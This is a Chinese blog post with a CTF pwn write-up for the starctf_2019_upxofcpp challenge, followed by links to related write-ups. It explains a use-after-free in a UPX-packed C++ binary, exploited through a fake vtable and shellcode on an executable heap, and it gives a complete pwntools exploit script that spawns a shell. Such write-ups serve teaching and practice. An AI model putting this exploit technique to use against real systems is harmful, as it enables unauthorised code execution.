starctf_2019_upxofcpp

最新推荐文章于 2023-05-29 23:33:57 发布
最新推荐文章于 2023-05-29 23:33:57 发布
阅读量537 收藏
点赞数 1
分类专栏: CTF pwn 二进制漏洞 文章标签: 安全 PWN CTF 二进制漏洞 UAF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105861142
版权
CTF 同时被 3 个专栏收录
161 篇文章 9 订阅
订阅专栏
pwn
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

starctf_2019_upxofcpp

程序用了UPX壳保护,通过upx –d脱壳后,拿到IDA里分析。

Delete以后没有清空指针,存在UAF,但是无法double free,因为程序中使用虚表调用,delete一次后,虚表对应位置已经被清空。因此第二次delete同一个chunk将进入else语句,进而崩溃。由于函数指针放在chunk里,因此,我们可以伪虚表指针,再利用UAF来执行。由于使用的是upx加壳,脱壳后,显示NX保护是关闭的,但是宿主是upx的壳,upx壳程序通过mmap映射出RWX的内存放置受保护的程序,因此,在这里堆栈是可执行的,也可以通过gdb调试查看。因此,我们在堆里布置下shellcode。

我们先申请两个堆释放

add(2,0x20/4,[-1])

add(3,0x20/4,[-1])

 

delete(2)

delete(3)

接下来我们触发malloc_cosolidate

add(4,0x100,[-1])

此时,2的fd伪造写上了main_arena 88的地址

因此,main_arena_88被当成一个虚表

Main_arena_88+0x10处指向2的头

Show功能取得正是vtable+0x10处的函数指针来执行

因此, Main_arena_88+0x10处的数据被当成一个函数指针,因此,我们只要利用堆的共用,在2的prev_size处布置一条jmp $xxxx的指令,然后通过show(2)就可以执行这个jmp,跳到主shellcode里。

#coding:utf8
from pwn import *

context(os='linux',arch='amd64')
sh = process('./starctf_2019_upxofcpp')
#sh = process('./upxofcpp')
#sh = remote('node3.buuoj.cn',28611)

def add(index,size,data):
   sh.sendlineafter('Your choice:','1')
   sh.sendlineafter('Index:',str(index))
   sh.sendlineafter('Size:',str(size))
   for x in data:
      if (x & 0x80000000 == 0x80000000) and x != -1:
         x -= 0x100000000
      sh.sendline(str(x))

def delete(index):
   sh.sendlineafter('Your choice:','2')
   sh.sendlineafter('index:',str(index))

def show(index):
   sh.sendlineafter('Your choice:','4')
   sh.sendlineafter('index:',str(index))

shellcode = asm(shellcraft.sh())
data = []
for x in range(0,len(shellcode),4):
   data.append(u32(shellcode[x:x+4]))
add(0,len(data),data)
add(1,0x18/4,[0,1,2,3,u32(asm('jmp $-0x70').ljust(4,'\x00')),-1])
add(2,0x20/4,[-1])
add(3,0x20/4,[-1])

delete(2)
delete(3)
add(4,0x100,[-1])
#getshell
show(2)

sh.interactive()

 

ha1vk
关注
专栏目录
starctf 2019 hackme
weixin_46483787的博客
04-19 2591
学kernel的第四天 解包之后发现init是空的,好怪哦 接下来分析ko文件,可以看到只实现了一个ioctl比较有用 首先是与用户态交互,交互方式是每次32字节,可以看做一个结构体 struct io { dword idx dword padding qword buf qword len qword offset } 然后实现了增删读写四个功能 在读写的时候进行了怎样的操作我们来观察一下: 首先会根据传入的结构体中的idx来确定对哪个chunk进行操作,然后根据offset来确定要读写
BUUCTF-PWN刷题记录-12
weixin_44145820的博客
04-23 751
ciscn_2019_sw_1 一道思路比较独特的格式化字符串漏洞题目 main函数中只有一次利用漏洞的机会 有system的got表项 一个可行思路是把printf的GOT改为system@plt,然后输入/bin/sh,但是考虑到只有一次机会就比较困难 所以我们需要一个能让main多次执行的办法 这时我们只要把main的地址填入finit_array就能无限循环main函数了 简单介绍一...
*CTF 2019 quicksort、babyshell、upxofcpp
weixin_30341735的博客
04-29 177
这次参加比赛总共出了三道,有两道队友都先交了,还是tcl,heap_master卡了差不多一天没解决。。。。还是记录一下出的题目吧 quicksort 题目大体流程就是输入要输入的数字数量,然后输入数字,经过一个快速排序输出,然后结束。 漏洞: gets函数这里存在栈溢出,可以覆盖i,j,ptr,num。 利用思路: libc泄露:可以修改ptr指向gets_got,并将i和n...
linux kernal pwn STARCTF 2019 hackme(一) 劫持modprobe_path
yongbaoii的博客
04-20 533
从用户态传入了0x20的数据,其数据放在了pool里面 在IDA里面看的话就是 就是他传入的四个QWORD 。 我们可以看得出来30001的时候就是通过v17来找到相关地址,然后kfree,再清零 所以其实就看得出来v17是index。 功能30002 v8是slab的地址 v20是从哪开始写 v9[1]里面就是size 所以就是往里面写 功能30003 上面是写进去 所以这个自然就是读出来 功能30000 读入一段 根据这一段申请slab 漏洞有两个 首先我们显而易见的在读写slab的时候对of.
linux kernal pwn STARCTF 2019 hackme(四)官方正解利用userfaultfd机制double fetch
yongbaoii的博客
04-20 290
又是承接上文
[BUUCTF]PWN——starctf_2019_babyshell(有限制的shellcode)
mcmuyanga的博客
03-23 906
starctf_2019_babyshell 例行检查,64位程序,开启了nx main函数,往buf里写入shellcode,然后程序会执行shellcod sub_400786(),这个函数会对我们输入的shellcode进行检查 检查的时候*i即可退出,可以使用\x00来绕过。 ...
0ctf2018-babystack_writeup
CabbageWind的博客
08-17 902
题目:0ctf2018-babystack 检查保护机制: 可以看到程序只提供了NX保护。 在IDA中进行反编译,发现一个可读的位置,存在栈溢出漏洞,可能可以利用: 使用peda计算read位置的偏移: 得到read位置距离返回地址的偏移为44,比read的长度0x40小,说明栈溢出漏洞可直接被利用。 查看文件ELF表 通过elf表中查看得知程序中不存在system函数,无法直接跳转;也不存在输出函数,无法打印got表地址。 查看vmmap 通过vmmap可以看到bss段可
v8_dll_resolver-v8的javascript dll解析器。-JavaScript开发
05-26
这需要4个函数才能起作用:read32(addr)->在addr读取32位read64(addr)->在addr读取64位addrof(obj)->获取obj的地址readStr(addr,tolower = false)->在addr处读取字符串(请参阅示例脚本)示例:在starCTF ...
安全客2020季刊第二季:新基建___智慧生活,从智能安全开始.pdf
08-08
StarCTF 2019 v8 off-by-one漏洞学习笔记 Fastjson反序列化漏洞史 CodeQL学习——污点分析 循序渐进分析CVE-2020-1066 CVE-2020-8835 Pwn2Own ebpf提权漏洞分析 pipePotato:一种新型的通用提权漏洞 致谢
UPX自动脱壳工具(2019测试成功)
04-09
UPX自动脱壳工具(2019测试成功),全自动脱壳,对于不会用OD的朋友,非常有用。
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
upx-3.91 UCL visual studio 2012 工程+代码
08-18
upx-3.91 + UCL + zlib visual studio 2012 工程+代码
starctf_2019_quicksort
seaaseesa的博客
07-24 333
starctf_2019_quicksort 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,栈溢出,可以将ptr指针覆盖掉,因此,我们可以任意地址写。 那么,我们可以将free的got表修改为main函数,这样就可以进行多次利用,同时后面的printf可以泄露地址 #coding:utf8 from pwn import * from LibcSearcher import * #sh = process('./starctf_2019_quicksort',env={'
CTF逆向-Upx脱壳攻防世界simple unpack
道阻且长,行则将至。
04-11 6332
文章目录前言UPX技术原理应用范围软件使用CTF实战程序查壳UPX脱壳总结 前言 加壳软件分两类: 压缩壳:压缩的目的是减少程序体积,如 ASPack、UPX、PECompact 等; 加密壳:加密是为了防止程序被反编译(反汇编)、跟踪和调试,如 ASProtect、Armadillo、 EXECryptor、Themida、VMProtect。 壳的存在会让我们找不到程序的真实入口点,从而不能正确的分析反汇编程序,也就对程序起到了一定的保护作用。 加密壳的基本思路: 将原本程序的 PE 相关代码复制
ctf刷题reverse新年快乐!(UPX脱壳)
最新发布
bbchk的博客
05-29 680
buuctf刷题reverse新年快乐!(UPX脱壳)
upx脱壳教程(buuctf逆向题新年快乐)
逆向萌新的博客
07-18 2473
逆向常见的upx壳,如何手脱壳,怎么去手脱upx
CTF-UPX脱壳加壳讲解;(详细版)
半岛铁盒的博客
11-30 4461
在做CTF-RE题的时候,下载的题目附件会发现缺少函数方法的现象,说明这个文件就被加壳处理了; 这个是加壳状态下的; 脱壳后~~~~~~~ 如何发现是加壳的呢? 除了开头所描述的方法,还有第二种 用Exeinfo PE 软件 查看附件信息; 此时这个软件就提示我们这个附件是UPX加壳处理的; 二. 脱壳 这里我只讲一种方法(因为我只会一种方法 -.-) 首先下载好打包好的UPX脱壳工具, 解压下载好: 讲一下用法吧 在这个文件夹当中输入 cmd 进入; 输入upx.exe -h 有如下反应:
starCTF2019-oob
钞sir的博客
09-11 840
何时才能遇到你呀,仅仅是如果
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值